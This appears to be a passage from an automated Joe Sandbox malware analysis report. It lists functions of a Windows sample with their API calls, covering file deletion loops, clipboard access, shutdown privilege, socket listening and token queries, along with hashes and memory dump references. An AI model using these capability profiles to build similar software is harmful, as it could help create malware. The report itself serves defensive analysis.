                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1240663315-0
                                                        • Opcode ID: 7c22e074384b164dd1d55e91121aec917590226d504b20076c2a1a2d2c54016c
                                                        • Instruction ID: 8fa27275f12f896a1a0c25316ec684bbf83e27af31d18483dac65d61d1e50ade
                                                        • Opcode Fuzzy Hash: 7c22e074384b164dd1d55e91121aec917590226d504b20076c2a1a2d2c54016c
                                                        • Instruction Fuzzy Hash: EFE14C31604204EFCB14DF28C895E6BBBE5FF89714B04856DF94ADB262DA35E901CF92
                                                        Function 00834164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: 6c893bdd30b25a444089f19d0932fea5c6b04b7944c83c6317edaf8528319754
                                                        • Instruction ID: 0c6a7e2d54eeaaf0791bcdcd1342daeabf6e48669d7d5cf3f3d87e4ff09c0b57
                                                        • Opcode Fuzzy Hash: 6c893bdd30b25a444089f19d0932fea5c6b04b7944c83c6317edaf8528319754
                                                        • Instruction Fuzzy Hash: A621A139200614DFDB10AF24DC09B6E7BA8FF56711F11802DFA4ADB2A2DB74AC40CB95
                                                        Function 008237EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007C4743,?,?,007C37AE,?), ref: 007C4770
                                                          • Part of subcall function 00824A31: GetFileAttributesW.KERNEL32(?,0082370B), ref: 00824A32
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 008238A3
                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0082394B
                                                        • MoveFileW.KERNEL32(?,?), ref: 0082395E
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0082397B
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0082399D
                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008239B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 4002782344-1173974218
                                                        • Opcode ID: 224e2ab82ff588beef10d1a50995b0d3b6e14337a589f5cfc8cb9a762bbfdb11
                                                        • Instruction ID: b042476f4cbfdf37b96223cfc0df7ac50bae8e06c8327bf22de27ef00ac26595
                                                        • Opcode Fuzzy Hash: 224e2ab82ff588beef10d1a50995b0d3b6e14337a589f5cfc8cb9a762bbfdb11
                                                        • Instruction Fuzzy Hash: 4E51933180415CEACF05EBA4D966EEDBB79BF16300F60406DE402B6191DF396F89CB61
                                                        Function 0082F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0082F440
                                                        • Sleep.KERNEL32(0000000A), ref: 0082F470
                                                        • _wcscmp.LIBCMT ref: 0082F484
                                                        • _wcscmp.LIBCMT ref: 0082F49F
                                                        • FindNextFileW.KERNEL32(?,?), ref: 0082F53D
                                                        • FindClose.KERNEL32(00000000), ref: 0082F553
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                        • String ID: *.*
                                                        • API String ID: 713712311-438819550
                                                        • Opcode ID: 2ac33c865cb8aeffe8d91b0879e69c03fa0945c8e33b588baf08a5674f09d240
                                                        • Instruction ID: d760d72782b610b54aaa118b0a52d13ed5ea5fe3bd943f795863b34226eeaa3a
                                                        • Opcode Fuzzy Hash: 2ac33c865cb8aeffe8d91b0879e69c03fa0945c8e33b588baf08a5674f09d240
                                                        • Instruction Fuzzy Hash: 20414B7190022A9BCF14EF64DC49AEEBBB8FF05310F14457AE915E2292EB359A84CF50
                                                        Function 007D3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf
                                                        • String ID: 3c}$_}
                                                        • API String ID: 674341424-2413270705
                                                        • Opcode ID: c9c4b954acdccdbe26cb4293ebe86426243ea153dac3e70baeb74dd0775fe8d9
                                                        • Instruction ID: 97e0dd00c3958816e963daaa0724a50ee2cd903d2fb5eabea4296b12ff913c1e
                                                        • Opcode Fuzzy Hash: c9c4b954acdccdbe26cb4293ebe86426243ea153dac3e70baeb74dd0775fe8d9
                                                        • Instruction Fuzzy Hash: A32287716083419FD764DF24C885BAAB7E4FF84310F10492EF98A97381EB79E944CB92
                                                        Function 007D5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: e5497f9e0cec8b2602225b7b1342a4e6dea9abe0fc389f9d4e57c6c52d82d7c2
                                                        • Instruction ID: a99af3f3b86de520bcabd5647172c186219c9a0a002817c84a3bbf9eea09d74d
                                                        • Opcode Fuzzy Hash: e5497f9e0cec8b2602225b7b1342a4e6dea9abe0fc389f9d4e57c6c52d82d7c2
                                                        • Instruction Fuzzy Hash: B9127970A00609DFDF04DFA5D985AEEB7B9FF48310F10452AE846E7250EB7AAD90CB51
                                                        Function 00823B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007C4743,?,?,007C37AE,?), ref: 007C4770
                                                          • Part of subcall function 00824A31: GetFileAttributesW.KERNEL32(?,0082370B), ref: 00824A32
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00823B89
                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00823BD9
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00823BEA
                                                        • FindClose.KERNEL32(00000000), ref: 00823C01
                                                        • FindClose.KERNEL32(00000000), ref: 00823C0A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 2649000838-1173974218
                                                        • Opcode ID: 3e8ba7b74916faa5826e9a7159df414e9c212183f6b1f1d88391af22cb4c27be
                                                        • Instruction ID: ca65da4313f6efb013b92c8f95742f4cabeeecafd7f0f1c081a3cb00af6469fc
                                                        • Opcode Fuzzy Hash: 3e8ba7b74916faa5826e9a7159df414e9c212183f6b1f1d88391af22cb4c27be
                                                        • Instruction Fuzzy Hash: 2E318D31008395DBC305EF24D8A9DAFB7E8BE96314F404D2DF4D592192EB299A08CB63
                                                        Function 008251BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 008187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0081882B
                                                          • Part of subcall function 008187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00818858
                                                          • Part of subcall function 008187E1: GetLastError.KERNEL32 ref: 00818865
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 008251F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-194228
                                                        • Opcode ID: 44b31fece32fdad309e733fcf9ddf7f6d0cabbdda87c202adac4c6da76082946
                                                        • Instruction ID: 583cfaa1e262a83aeb1cd32fcb92d96290885487133209295cc32d694c036ad2
                                                        • Opcode Fuzzy Hash: 44b31fece32fdad309e733fcf9ddf7f6d0cabbdda87c202adac4c6da76082946
                                                        • Instruction Fuzzy Hash: 0C012B357D1635EBF7286268BC9BFBB729CFB05354F240425F917E20D2DA715C808590
                                                        Function 00836283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008362DC
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 008362EB
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00836307
                                                        • listen.WSOCK32(00000000,00000005), ref: 00836316
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00836330
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00836344
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                        • String ID:
                                                        • API String ID: 1279440585-0
                                                        • Opcode ID: 84c66fcdfe279a168cd9fdc5aed065ce2611933b7a8127111651b18fe0cdcb6a
                                                        • Instruction ID: 92c552d42c21f0cfbd9b38ec9ebe78a989d3fef841c66ebca4433b111611ccc9
                                                        • Opcode Fuzzy Hash: 84c66fcdfe279a168cd9fdc5aed065ce2611933b7a8127111651b18fe0cdcb6a
                                                        • Instruction Fuzzy Hash: 5B21B175600204AFCB10AF68C849B6EB7A9FF89710F14816CEA56D7392DB74AC11CB91
                                                        Function 007D5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007E0DB6: std::exception::exception.LIBCMT ref: 007E0DEC
                                                          • Part of subcall function 007E0DB6: __CxxThrowException@8.LIBCMT ref: 007E0E01
                                                        • _memmove.LIBCMT ref: 00810258
                                                        • _memmove.LIBCMT ref: 0081036D
                                                        • _memmove.LIBCMT ref: 00810414
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1300846289-0
                                                        • Opcode ID: 02f1f4f6f0b11da4456960ea662d437d820eab78913a2c8266ea244b0c2a1b4f
                                                        • Instruction ID: bfc8241bdcb3a245fe36487ad9e020c30d7ef627573bbfcd2f0b24033f2d6e23
                                                        • Opcode Fuzzy Hash: 02f1f4f6f0b11da4456960ea662d437d820eab78913a2c8266ea244b0c2a1b4f
                                                        • Instruction Fuzzy Hash: 6402A0B0A00209DBCF04DF65D985AAE7BB9FF48310F14806DE80ADB355EB79D990CB95
                                                        Function 007C1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 007C19FA
                                                        • GetSysColor.USER32(0000000F), ref: 007C1A4E
                                                        • SetBkColor.GDI32(?,00000000), ref: 007C1A61
                                                          • Part of subcall function 007C1290: DefDlgProcW.USER32(?,00000020,?), ref: 007C12D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ColorProc$LongWindow
                                                        • String ID:
                                                        • API String ID: 3744519093-0
                                                        • Opcode ID: fa465c4b025a4ae09389791506f02ceccb1919c15b5bb5cff0880bf574563b56
                                                        • Instruction ID: accd00b67cf4aacce846755041e062557976ba0459f3824035e8a0da01420199
                                                        • Opcode Fuzzy Hash: fa465c4b025a4ae09389791506f02ceccb1919c15b5bb5cff0880bf574563b56
                                                        • Instruction Fuzzy Hash: 8AA10A71106588FAE628AB3D8C48F7F275DEB43341B94813EF603D5293DA2DED0196B6
                                                        Function 0082BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0082BCE6
                                                        • _wcscmp.LIBCMT ref: 0082BD16
                                                        • _wcscmp.LIBCMT ref: 0082BD2B
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0082BD3C
                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0082BD6C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 2387731787-0
                                                        • Opcode ID: ceae5ec6b89b261861c7227ff7abea015bee754225c59f8a570a4cb56daa158d
                                                        • Instruction ID: 229c380943f258c4499ea592af862d059d774663d59de6b9360a0d01ed7672f1
                                                        • Opcode Fuzzy Hash: ceae5ec6b89b261861c7227ff7abea015bee754225c59f8a570a4cb56daa158d
                                                        • Instruction Fuzzy Hash: 88517635604612DFC718DF28D494EAAB3E8FF49320F10461DEA56C73A2DB34AD44CB91
                                                        Function 00836747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00837D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00837DB6
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0083679E
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 008367C7
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00836800
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0083680D
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00836821
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 99427753-0
                                                        • Opcode ID: 1fe74ad5805d4bf241d28c0a13cc256e581e0384b082406433807964bc99968d
                                                        • Instruction ID: 58b49f12dc8978bbe9afdfa88cbb497742c2da041aedf239f8ee5e75a92a6de6
                                                        • Opcode Fuzzy Hash: 1fe74ad5805d4bf241d28c0a13cc256e581e0384b082406433807964bc99968d
                                                        • Instruction Fuzzy Hash: 1641B375600204EFDB50AF28888AF6E77E8EF49714F44856CFA16AB3C3DA749D008792
                                                        Function 00845376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        • Opcode ID: b234a75795e8a08cb8ff183a1671e38c10a3271603da7fd1baf0601c6d7171cf
                                                        • Instruction ID: afbc5516e0b5c544563aed8dbba3de809bf99192673e5f2eebfa05cf24ee98f2
                                                        • Opcode Fuzzy Hash: b234a75795e8a08cb8ff183a1671e38c10a3271603da7fd1baf0601c6d7171cf
                                                        • Instruction Fuzzy Hash: C411C431300A19AFEB215F269C48B6FBB99FF467A1B41402DF945D7243DB74DD01CAA4
                                                        Function 008180A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008180C0
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008180CA
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008180D9
                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008180E0
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008180F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 52f921bfbcb4a17050ee9ad92b7ce8f2ee1866f55c73a58271a3a4401027d164
                                                        • Instruction ID: e3cf3648f546febae584babeeb9e8e3e2fe0ab2e8cbb29bb542bfae160844844
                                                        • Opcode Fuzzy Hash: 52f921bfbcb4a17050ee9ad92b7ce8f2ee1866f55c73a58271a3a4401027d164
                                                        • Instruction Fuzzy Hash: C5F06235240204FFEB214FA5EC8DEA73BACFF8A755F000029FA45C6151CB619C41DA60
                                                        Function 0082C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 0082C432
                                                        • CoCreateInstance.OLE32(00852D6C,00000000,00000001,00852BDC,?), ref: 0082C44A
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                        • CoUninitialize.OLE32 ref: 0082C6B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                        • String ID: .lnk
                                                        • API String ID: 2683427295-24824748
                                                        • Opcode ID: df9bb77d297a69520a8885b2ab8b0c286a675a5f1990c21e5f24d515e74bcfd0
                                                        • Instruction ID: 7faa7e532c8f031c3ea95e2fec1121bdde7304f7c80108d0de8bf1947afa258b
